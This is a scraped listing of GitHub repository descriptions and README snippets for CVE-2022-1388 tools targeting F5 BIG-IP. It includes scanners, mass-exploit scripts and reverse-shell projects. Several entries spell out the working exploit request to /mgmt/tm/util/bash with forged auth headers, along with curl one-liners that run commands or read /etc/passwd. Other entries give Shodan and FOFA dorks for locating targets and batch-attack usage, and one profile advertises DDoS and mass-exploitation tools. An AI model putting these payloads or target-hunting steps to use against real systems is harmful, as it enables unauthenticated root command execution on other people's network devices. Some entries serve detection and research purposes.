CVE-2022-1388

LazyScan 本项目基于fscan进行拓展，仅供学习交流，请勿非法利用。 功能概述：在PoC验证的基础上实现了Exploit利用 常见服务利用 SSH弱口令 MySQL弱口令 Redis未授权/弱口令 MSSQL弱口令 PostgreSQL弱口令 etcd未授权 Kube API Server未授权 Docker Daemon未授权 Kubelet未授权 SMB弱口令 WMI横向 Web PoC插件 PHP-C

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust

CVE-2022-1388-rs Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust Summary To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerability: Connection header must include X-F5-Auth-Token X-F5-Auth-Token header must be present Host header must be localhost / 127001 or the C

Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5)

CVE-2022-1388-checker Simple script realizado en bash, para revisión de múltiples hosts para CVE-2022-1388 (F5) [+] Uso: /CVE-2022-1388sh hoststxt Referencias supportf5com/csp/article/K23605346 thehackernewscom/2022/05/f5-warns-of-new-critical-big-ip-remotehtml wwwcisagov/uscert/ncas/current-activity/2022/05/04/f5-releases-securi

A vulnerability scanner that detects CVE-2021-21980 vulnerabilities.

westone-CVE-2022-1388-scanner Undisclosed requests may bypass iControl REST authentication Installation & Usage git clone githubcom/Osyanina/westone-CVE-2021-21980-scannergit cd westone-CVE-2022-1388-scanner cmd CVE-2022-1388exe

CVE-2022-1388 F5 BIG-IP RCE 批量检测

F5 BIG-IP RCE Check check： CVE-2022-1388 F5 BIG-IP RCE 批量检测 exp： 注：exp是根据 CVE-2021-22986 更改！

CVE-2022-1388 supportf5com/csp/article/K23605346 此漏洞可能允许未经身份验证的攻击者通过管理端口和/或自身 IP 地址对 BIG-IP 系统进行网络访问，以执行任意系统命令、创建或删除文件或禁用服务。 将F5 IP地址写入F5_IP后，执行CVE-2022-1388_scansh，如果存在漏洞将会打印 参考： githubcom

CVE-2022-1388 F5 BIG-IP RCE 批量检测

F5 BIG-IP RCE Check check： CVE-2022-1388 F5 BIG-IP RCE 批量检测 exp： 注：exp是根据 CVE-2021-22986 更改！

F5 BIG-IP iControl REST身份验证绕过漏洞

CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞 Optional Arguments: -h, --help show this help message and exit -u url, --url url Target url eg:"127001" -f file, --file file Targets in file eg:"iptxt" Use python3 CVE-2022-1388py -u 127001 python3 CVE-2022-1388py -f iptxt Link wwwhenry4e36top/inde

Reverse Shell for CVE-2022-1388

F5-BigIP-CVE-2022-1388 Reverse Shell for CVE-2022-1388 **** Download and Usage ******* git clone githubcom/qusaialhaddad/F5-BigIP-CVE-2022-1388git cd F5-BigIP-CVE-2022-1388 chmod +x Exploit-F5-BigIP-CVE-2022-1388py python3 Exploit-F5-BigIP-CVE-2022-1388py -t BigIP-IPAddress:Port -c "tmsh show sys hardware"

POC of CVE-2022-1388

CVE-2022-1388

CVE-2022-1388-EXP可批量实现攻击

CVE-2022-1388-EXP This is CVE-2022-1388-EXP Author:Caps@BUGFOR Github:githubcom/bytecaps Remaker:LinJacck Github:githubcom/LinJacck 功能展示 验证模式：python CVE_2022_1388py -v -u target_url 攻击模式：python CVE_2022_1388py -a -u target_url -c command 批量检测：python CVE_2022_1388py -s -f file WebShell模式：python CVE_2022_1388py -

CVE-2022-1388-F5-BIG-IP 在同级目录下放targettxt 直接执行即可

This repository consists of the python exploit for CVE-2022-1388 (F5's BIG-IP Authentication Bypass to RCE)

CVE-2022-1388 This repository conssists of the python exploit code for CVE-2022-1388( F5's BIG-IP RCE) usage: exploitpy [-h] -t TARGET -p PORT -c CMD [--ssl] options: -h, --help show this help message and exit -t TARGET, --target TARGET Specify the IP Address/Domain Name of the vulnerable server -p PORT, --port PORT Specify port number of the vulnerable server

CVE-2022-1388

CVE-2022-1388 CVE-2022-1388

BIG-IP iCONTROL REST AUTH BYPASS RCE POC CVE-2022-1388

CVE-2022-1388-POC BIG-IP iCONTROL REST API AUTH BYPASS /RCE EXPLOIT BIG-IP RCE 2022 DETAILS: THE iCONTROL REST API Of BIG-IP cantain a flaw with a CVE score of 98 that sending a (REDACTED) request to auth backend will bypass the auth and can execute arbitrary system commands,create or delete files MITIGATION: supportf5com/csp/article/K23605346 only 12x and 11x will

Nuclei Template for CVE-2022-1388

CVE-2022-1388 Nuclei Template for CVE-2022-1388 I have used the shadow file for poc , you can use the passwd ('/etc/passwd') file as well Change the Extractor according to your choice POC Reference: supportf5com/csp/article/K23605346

Exploit CVE For more CVE Exploits visit: Exploit CVE CVE Lists CVE-2022-1388 CVE-2022-21907

POC for CVE-2022-1388

CVE-2022-1388 POC for CVE-2022-1388 affecting multiple F5 products Follow the Horizon3ai Attack Team on Twitter for the latest security research: Horizon3 Attack Team James Horseman Zach Hanley Technical Analysis A technical root cause analysis of the vulnerability can be found on our blog: wwwhorizon3ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-de

Tool for CVE-2022-1388

CVE-2022-1388 Checking and exploit for CVE-2022-1388 Installation: python3 -m pip install -r requirementstxt Usage Single : python3 cvepy s [fullurl] [api_command] #example python3 cvepy s 127001:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'

cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE

CVE-2022-1388 BIG IP REST RCE On F5 BIG-IP 161x versions prior to 16122, 151x versions prior to 15151, 141x versions prior to 14146, 131x versions prior to 1315, and all 121x and 116x versions, undisclosed requests may bypass iControl REST authentication Use the following cURL one-liner to test for this vulnerability curl -k --header "Host: 1270

Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP)

CVE-2022-1388-Exploit Test and Exploit Scripts for CVE 2022-1388 (F5 Big-IP) mass_checkpy will take a file input and check the hosts are vulnerable without exploiting them Detection: Scanning for /mgmt/tm/util/bash as an endpoint, likely to be in web server logs Or if you have a F5 go patch it, the affected versions are shown below and the patch is available here su

Exploit and Check Script for CVE 2022-1388

F5-CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage Check against single host python3 CVE-2022-1388py -v true -u target_url Attack host and test command python CVE_2022_1388py -a true -u target_url -c command Attack list of hosts python CVE_2022_1388py -s true -f file

-- FOR EDUCATIONAL USE ONLY -- Proof-of-Concept RCE for CVE-2022-1388, plus some added functionality for blue and red teams

CVE-2022-1388 RCE, Reverse Shell, and Auto-Export PCAP -- FOR EDUCATIONAL USE ONLY -- The author is not responsible or held liable for any actions taken with any aspect of this project/repository I created this for the purposes of understanding the attack as well as writing detections within a SIEM and wanted to share for others to do the same Use at your own risk This explo

Gather and update all available and newest CVEs with their PoC.

CVE PoC Almost every publicly available CVE PoC Current hottest CVEs Title URL CVE-2022-0001 /trickest/cve/blob/main/2022/CVE-2022-0001md CVE-2022-25297 /trickest/cve/blob/main/2022/CVE-2022-25297md CVE-2022-1388 /trickest/cve/blob/main/2022/CVE-2022-1388md CVE-2022-25451 /trickest/cve/blob/main/2022/CVE-2022-25451md To see the complete history go here Ho

Improved POC for CVE-2022-1388 that affects multiple F5 products.

CVE-2022-1388 by 1vere$k with command shell Improved POC for CVE-2022-1388 that affects multiple F5 products This is an improved version of Horizon3's Proof of Concept for CVE-2022-1388: githubcom/horizon3ai/CVE-2022-1388 Also it's a complete rework with refactoring for PsychoSec work by githubcom/PsychoSec2/CVE-2022-1388-POC LOL this guy mentioned

Config files for my GitHub profile.

Meow meow meow Lamers! 👋 My projects: Kitty Elixir DDoS Scheduler: API Services and Scheduler (not a full C2C but) (onion DDoS) Mass-Exploit CVE-2022-29464 Mass-Exploit CVE-2022-1388 About: (Electr0lulz) - electrolulz@protonmailcom Donate something to Cats: bc1qxeadgxkng2w0sw09zg8p6f946j4ynyj0x7rzl9 💲HODL FOREVER SINCE 2014 💻 Terminal 📚 Known

F5 BIG-IP iControl REST vulnerability RCE exploit with Java including a testing LAB

CVE-2022-1388 F5 BIG-IP iControl REST vulnerability RCE exploit with Java Features Scan a single target Scan multiple targets Exploit with a shell Setup Lab You can find the lab Here Run You can run the code directly by user# javac mainjava followed by user# java main help If you don't have JVM, you can execute user# /main help GLibc-x86_64-linux Screenshot Autho

CVE-PoC

CVE PoC Almost every publicly available CVE PoC Current hottest CVEs Title URL CVE-2022-0001 /trickest/cve/blob/main/2022/CVE-2022-0001md CVE-2022-25297 /trickest/cve/blob/main/2022/CVE-2022-25297md CVE-2022-1388 /trickest/cve/blob/main/2022/CVE-2022-1388md CVE-2022-25451 /trickest/cve/blob/main/2022/CVE-2022-25451md To see the complete history go here Ho

20220718 F5 BIG-IP iControl REST Vulnerability CVE-2022-1388 | tstats count from datamodel=Web where Weburl="/mgmt/tm/util/bash" Webhttp_method="POST" by Webhttp_user_agent Webhttp_method, Weburl,Weburl_length Websrc, Webdest | drop_dm_object_name("Web") Web Spring Cloud Function FunctionRouter | tstats count from datamodel=Web where Webht

CVE-2022-1388 Poc:pocsuite -r CVE-2022-1388_F5_BIG-IP_POC_EXPpy -u url Exp:pocsuite -r CVE-2022-1388_F5_BIG-IP_POC_EXPpy -u url --attack --command [command] 免责声明 此工具仅用于学习、研究和自查。不应将其用于非法目的。使用本工具产生的一切风险与我无关！ Disclaimer This tool is for study, research, and self-examination only It sh

Custom Nuclei Templates

Custom Nuclei Templates How to Run Download the files or repository locally Run with Nuclei Sample Runs Install the nuclei scanner githubcom/projectdiscovery/nuclei git clone githubcom/psc4re/nuclei-templatesgit cd nuclei-templates nuclei -t /* -u targets CVE-2002-1388: nuclei -t /cve-2022-1388yaml -u https:

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE POST /mgmt/tm/util/bash HTTP/11 Host: Accept-Encoding: gzip, deflate Accept: */* Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host Content-type: application/json X-F5-Auth-Token: anything Authorization: Basic YWRtaW46 Content

PoC for CVE-2022-1388_F5_BIG-IP

CVE-2022-1388 EXPLOIT POC [F5 BIG IP] POST /mgmt/tm/util/bash HTTP/11 Host: REDACTED:8083 Content-Length: 45 Connection: Keep-Alive,X-F5-Auth-Token Cache-Control: max-age=0 X-F5-Auth-Token: SherlockSecure Content-Type: application/json Authorization: Basic YWRtaW46aG9yaXpvbjM= { "command":"run", "utilCmdArgs":"-c id" }

CVE-2022-1388

A Test API for testing the POC against CVE-2022-1388

CVE2022-1388_TestAPI A Test API for testing the POC against CVE-2022-1388 To run from host pip install -r requirementstxt uvicorn main:app --reload To run from Docker make build make run

CVE-2022-1388, bypassing iControl REST authentication

CVE-2022-1388 Impact This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services There is no data plane exposure; this is a control plane issue only Usage /CVE-2022-1388sh <ip_addr>

NYCU_NetSec_Project This is an assignment for NYCU's NetSec class Topic: CVE-2022-1388 CVE-2022-1388 This exploit targets the BIG-IP iControl REST vulnerability CVE-2022-1388 in F5 Systems Please see the F5 advisory for affected versions and other information

CVE PoC Almost every publicly available CVE PoC Current hottest CVEs Title URL CVE-2022-0001 /trickest/cve/blob/main/2022/CVE-2022-0001md CVE-2022-25297 /trickest/cve/blob/main/2022/CVE-2022-25297md CVE-2022-1388 /trickest/cve/blob/main/2022/CVE-2022-1388md CVE-2022-25451 /trickest/cve/blob/main/2022/CVE-2022-25451md To see the complete history go here Ho

Abstruse Book Night Read.

·ABNR·专栏 Abstruse Book Night Read 这个专栏主要用于记录平时的读书笔记、研究总结和思维碎片。 Study notes can persist for three years, you will be able to become a teacher 专栏列表： 天书夜读  linux_kernel_development_thrid_edition os_of_hit_edu_cn_doctor_Li 寒江独钓 Hyper-V ALL IN ONE 2022-05-15 Hyper-V�

PoC for CVE-2022-1388_F5_BIG-IP

CVE-2022-1388 EXPLOIT POC [F5 BIG IP] POST /mgmt/tm/util/bash HTTP/11 Host: REDACTED:8083 Content-Length: 45 Connection: Keep-Alive,X-F5-Auth-Token Cache-Control: max-age=0 X-F5-Auth-Token: SherlockSecure Content-Type: application/json Authorization: Basic YWRtaW46aG9yaXpvbjM= { "command":"run", "utilCmdArgs":"-c id" }

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP…

Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 98 The iControl REST API is used for the management and configuration of BIG-IP devices CVE-2022-1388 could be exploited by an unauthenticated attac

CVE PoC Almost every publicly available CVE PoC Current hottest CVEs Title URL CVE-2022-0001 /cvedb/cve/blob/main/2022/CVE-2022-0001md CVE-2022-25297 /cvedb/cve/blob/main/2022/CVE-2022-25297md CVE-2022-1388 /cvedb/cve/blob/main/2022/CVE-2022-1388md CVE-2022-25451 /cvedb/cve/blob/main/2022/CVE-2022-25451md To see the complete history go here How it works C

CVE-2022-1388-PocExp,新增了多线程,F5 BIG-IP RCE exploitation

CVE-2022-1388-PocExp CVE-2022-1388-PocExp,新增了多线程 Usgae Usage Single URL：python3 CVE-2022-1388py -u url Usage, List of URLS：python3 CVE-2022-1388py -f urltxt Usage, Exec：python3 CVE-2022-1388py -u url -c command Usage, ExecFile：python3 CVE-2022-1388py -f urltxt -c id

CVE PoC Almost every publicly available CVE PoC Current hottest CVEs Title URL CVE-2022-0001 /trickest/cve/blob/main/2022/CVE-2022-0001md CVE-2022-25297 /trickest/cve/blob/main/2022/CVE-2022-25297md CVE-2022-1388 /trickest/cve/blob/main/2022/CVE-2022-1388md CVE-2022-25451 /trickest/cve/blob/main/2022/CVE-2022-25451md To see the complete history go here Ho

CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 9.8. The iControl REST API is used for the management and configuration of BIG-IP devices. CVE-2022-1388 could be exploited by an unauthenticated attacker with network access to the management port or self IP…

Nuclei Template Exploit F5 BIG-IP iControl REST Auth Bypass RCE | Command Parameter CVE-2022-1388 is an authentication bypass vulnerability in the REST component of BIG-IP’s iControl API that was assigned a CVSSv3 score of 98 The iControl REST API is used for the management and configuration of BIG-IP devices CVE-2022-1388 could be exploited by an unauthenticated attac

CVE-2022-1388 Scanner

shodan search 'httphtml:"BIG-IP Configuration Utility"' --fields=ip_str,port --separator ":" --limit 10 | grep '' shodan search 'httptitle:"BIG-IP®-+Redirect"+"Server"' --fields=ip_str,port --separator ":" --limit 10 | grep '' CVE-2022-1388 CVE-2022-1388 Scanner Usage $python3 CVE-

CVE-2022-1388

CVE-2022-1388 F5 BIG-IP Unauthenticated RCE Vulnerability F5 BIG-IP iControl REST身份验证绕过RCE漏洞 fofa keywords: title="BIG-IP®- Redirect" usage attack $ python3 cve-2022-1388py -t 203xxxxxxxxx [+] 203xxxxxxxxx is vulnerable [input your command]: id uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_

CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE POST /mgmt/tm/util/bash HTTP/11 Host: Accept-Encoding: gzip, deflate Accept: */* Connection: close, X-F5-Auth-Token, X-Forwarded-For, Local-Ip-From-Httpd, X-F5-New-Authtok-Reqd, X-Forwarded-Server, X-Forwarded-Host Content-type: application/json X-F5-Auth-Token: anything Authorization: Basic YWRtaW46 Conte

CVE-2022-1388 Checking and exploit for CVE-2022-1388 Installation: python3 -m pip install -r requirementstxt Usage Single : python3 cvepy s [fullurl] [api_command] #example python3 cvepy s 127001:8000/mgmt/tm/util/bash '{"command":"run","utilCmdArgs":"-c id"}'

CVE-2022-1388 F5 Big IP unauth remote code execution

F5-Big-IP-CVE-2022-1388 CVE-2022-1388 F5 Big IP unauth remote code execution PoC Follow us Vulnmachines YouTube Twitter Facebook LinkedIn

This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services. There is no data plane exposure; this is a control plane issue only.

Nuclei Template CVE-2022-1388 BIG-IP iControl REST Exposed [ May 06, 2022 ] This only verifies the presence of the API by hitting the authentication endpoint This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disa

👋 Intro: 🔭 I’m a Security Researcher working in Cyber Threat Intelligence since 2019 🎓 BSc (Hons) Graduate of Computer and Information Security 📜 Student of SANS FOR578 and earned the GIAC GCTI certification 📝 Co-Author and Instructor of the SANS FOR589 Cybercrime Intelligence course 👉 Read about my first year in CTI here ⚡ Fun fact: I discovered OZH

BIG-IP iControl REST vulnerability CVE-2022-1388 PoC

BIG-IP iControl REST vulnerability CVE-2022-1388 PoC This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services PoC You can use the following curl one liner to check for the F5 Big-IP vulnerability or use

Determine the running software version of a remote F5 BIG-IP management interface.

BIG-IP Scanner Determine the running software version of a remote F5 BIG-IP management interface Developed with ❤️ by the Bishop Fox Cosmos team Description CVE-2022-1388, a critical vulnerability in the F5 BIG-IP management interface, allows an attacker to bypass authentication and remotely execute arbitrary system commands Bishop Fox developed a BIG-IP scanner t

CVE PoC Almost every publicly available CVE PoC Current hottest CVEs Title URL CVE-2022-0001 /cvedb/cve/blob/main/2022/CVE-2022-0001md CVE-2022-25297 /cvedb/cve/blob/main/2022/CVE-2022-25297md CVE-2022-1388 /cvedb/cve/blob/main/2022/CVE-2022-1388md CVE-2022-25451 /cvedb/cve/blob/main/2022/CVE-2022-25451md To see the complete history go here How it works C

F5 BIG-IP RCE exploitation (CVE-2022-1388)

F5 BIG-IP RCE exploitation (CVE-2022-1388) POST (1): POST /mgmt/tm/util/bash HTTP/11 Host: <redacted>:8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 {"command": "run" , "utilCmdArgs": " -c 'id' " } curl commandliner: $ curl

CVE-2022-1388 RCE checker Simple bash script to check CVE-2022-1388 RCE (F5 BIG-IP) [+] Usage: /CVE-2022-1388sh hoststxt CVE-2022-1388 RCE POC Exploit Don't forget to change the IP address curl -X POST 10001/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-a

CVE-2022-1388 RCE checker Simple bash script to check CVE-2022-1388 RCE (F5 BIG-IP) [+] Usage: /CVE-2022-1388sh hoststxt CVE-2022-1388 RCE POC Exploit Don't forget to change the IP address curl -X POST 10001/mgmt/tm/util/bash -d "{'command':'run','utilCmdArgs':-e 'cat /etc/passwd'}" -H "Connection: keep-a

cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE

CVE-2022-1388 On F5 BIG-IP 161x versions prior to 16122, 151x versions prior to 15151, 141x versions prior to 14146, 131x versions prior to 1315, and all 121x and 116x versions, undisclosed requests may bypass iControl REST authentication Use the following cURL one-liner to test for this vulnerability curl -k --header "Host: 127001" --head

Scan IP ranges for IP's vulnerable to the F5 Big IP exploit (CVE-2022-1388)

CVE-2022-1388 F5 BigIP exploit (CVE-2022-1388) scanner

PoC for exploiting CVE-2022-1388 on BIG IP F5

CVE-2022-1388 - refresh PoC for exploiting CVE-2022-1388 on BigIP F5 Exploit Usage python3 refreshpy -h usage: refreshpy [-h] [-u URL] [-f F] [-c CMD] [-s SH] optional arguments: -h, --help show this help message and exit -u URL, --url URL target url -f F, --file F url file -c CMD, --command CMD command -s SH, --shell S

CVE-2022-1388-Exploit Exploit and Check Script for CVE 2022-1388 Usage To Check against single host URL python3 exploitpy -v true -u target_url To Attack host and test command on this host python3 exploitpy -a true -u target_url -c command Attack list of hosts or attaching file of host URL's I

CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞

CVE-2022-1388 CVE-2022-1388 F5 BIG-IP iControl REST身份验证绕过漏洞 ⚠️ 免责声明 此工具仅作为网络安全攻防研究交流，请使用者遵照网络安全法合理使用！ 如果使用者使用该工具出现非法攻击等违法行为，与本作者无关！

PoC For F5 BIG-IP - bash script Exploit one Liner

Exploit-F5-CVE-2022-1388 PoC For F5 BIG-IP - bash script Exploit one Liner Vulnerable Versions : BIG-IP versions 1610 to 1612 (Patch released) BIG-IP versions 1510 to 1515 (Patch released) BIG-IP versions 1410 to 1414 (Patch released) BIG-IP versions 1310 to 1314 (Patch released) BIG-IP versions 1210 to 1216 (End of Support) BIG-IP versions 1161 to 1165

Simple shell script for the exploit

CVE-2022-1388 by 1vere$k CVE-2022-1388 the proof-of-concept Two regimes of work with: simple target URL, default PORT will be set as 80 if it wasn't mentioned; file with list of targets <IP>:<PORT> \n\r; Usage echo "+-------------------For-The-Help-------------------------------------+"; echo "Example#1: /cve-2022-1388sh -h

CVE-2022-1388-F5-BIG-IP 在同级目录下放targettxt 直接执行即可

CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合

F5-BIG-IP POC go语言编写CVE-2020-5902 CVE-2021-22986 CVE-2022-1388 POC集合 后续会增加F5其他POC author:160teamwest9B 仅限用于安全研究人员在授权的情况下使用，遵守网络安全法，产生任何问题，后果自负，与作者无关。 01-基本介绍 F5 POC合集： CVE-2020-5902：F5 BIG-IP远程代码执行漏洞 CVE-2021-22986：F5 BIG-IP iC

F5-BIG-IP-TOOLS 工具简介 针对 F5 系列漏洞的快速利用工具，新手代码，有问题欢迎提issus 使用方法 -u url you target, example: 19216811 -c command to eval you command to eval, example: id -v the vul to use options: cve-2022-1388 cve-2021-22986 cve-2020-5902 -m only use in cve-2020-5902 options: fileRead userList dirList

PoC for CVE-2022-1388 affecting F5 BIG-IP.

CVE-2022-1388 PoC for CVE-2022-1388 affecting F5 BIG-IP Usage $ /pocsh --help Usage: pocsh [--help] --file FILE --scan --exploit [--payload PAYLOAD] CVE-2022-1388 PoC script One or multiple IPs can be scanned Arguments: --help Show this help message and exit --file FILE File list containing one or multiple IPs to test --scan

An Improved Proof of Concept for CVE-2022-1388 w/ an Interactive Shell

CVE-2022-1388 Poc by PsychoSec Improved POC for CVE-2022-1388 that affects multiple F5 products This is an improved version of Horizon3's Proof of Concept for CVE-2022-1388: githubcom/horizon3ai/CVE-2022-1388 This version contains multiple improvements as well as an interactive shell to run remote commands Technical Analysis: Horizon3's technical root cause

exploit poc

CVE-2022-1388-exploit exploit poc

K23605346: BIG-IP iControl REST vulnerability CVE-2022-1388

CVE-2022-1388 BIG-IP iControl REST vulnerability CVE-2022-1388 Usage This POC is Verified! curl -i -s -k -X $'POST' \ -H $'Host: localhost' -H $'Connection: keep-alive, X-F5-Auth-Token' -H $'Authorization: Basic YWRtaW46' -H $'X-F5-Auth-Token: a' -H $'Content-Length: 39' \ --data-binary $'{\"comma

F5 CVE-2022-1388 Scanner BIG-IP iControl REST vulnerability CVE-2022-1388 Scanner Usage # pip install -r requirementstxt # pytohn3 CVE-2022-1388-Scannerpy Request POST /mgmt/tm/util/bash HTTP/11 Host: REDACTED:8083 Content-Length: 45 Connection: Keep-Alive, X-F5-Auth-Token Cache-Control: max-age=0 X-F5-Auth-Token: vvs Authoriz

CVE-2022-1388 F5 BIG-IP RCE 多线程检测 use： 单个url: python3 CVE-2022-1388py -u xxxxxxxxxxxx 批量多线程: python3 CVE-2022-1388py -f urltxt 执行命令: python3 CVE-2022-1388py -u xxxxxxxxxxxx -c whoami result:

batch scan CVE-2022-1388

CVE-2022-1388 BIG-IP iControl REST vulnerability CVE-2022-1388 This vulnerability may allow an unauthenticated attacker with network access to the BIG-IP system through the management port and/or self IP addresses to execute arbitrary system commands, create or delete files, or disable services There is no data plane exposure; this is a control plane issue only USAGE 1、writ

CVE-2022-1388 POC exploit

CVE-2022-1388 CVE-2022-1388 POC exploit Usage usage: exploitpy [-h] [-t TARGET] [-l LIST] [-c COMMAND] optional arguments: -h, --help show this help message and exit -t TARGET, --target TARGET The IP address of the target, eg: 127001:9443 -l LIST, --list LIST List of target url saperated with new line -c COMMAND, --command COMMAN

PoC for CVE-2022-1388_F5_BIG-IP

CVE-2022-1388 EXPLOIT POC [F5 BIG IP] POST /mgmt/tm/util/bash HTTP/11 Host: REDACTED:8083 Content-Length: 45 Connection: Keep-Alive,X-F5-Auth-Token Cache-Control: max-age=0 X-F5-Auth-Token: SherlockSecure Content-Type: application/json Authorization: Basic YWRtaW46aG9yaXpvbjM= { "command":"run", "utilCmdArgs":"-c id" }

cURL one-liner to test for CVE-2022-1388 BIG-IP iControl REST RCE

CVE-2022-1388 BIG IP REST RCE On F5 BIG-IP 161x versions prior to 16122, 151x versions prior to 15151, 141x versions prior to 14146, 131x versions prior to 1315, and all 121x and 116x versions, undisclosed requests may bypass iControl REST authentication Use the following cURL one-liner to test for this vulnerability curl -k --header "Host: 1270

该文件夹集成自写的POC 下列是POC列表 一周保底更新一个POC脚本 PS：有些POC网上暂未公布[-]，只分享在个人知识星球 微信群会做日常的交流分享,需要关注公众号获取交流群信息👇 1[+]泛微OA_V9版本的SQL代码执行漏洞 2[-]泛微OA_V9全版本前台任意文件上传漏洞 3[+]Spring-Cloud-Function-SpEL_POC_EXP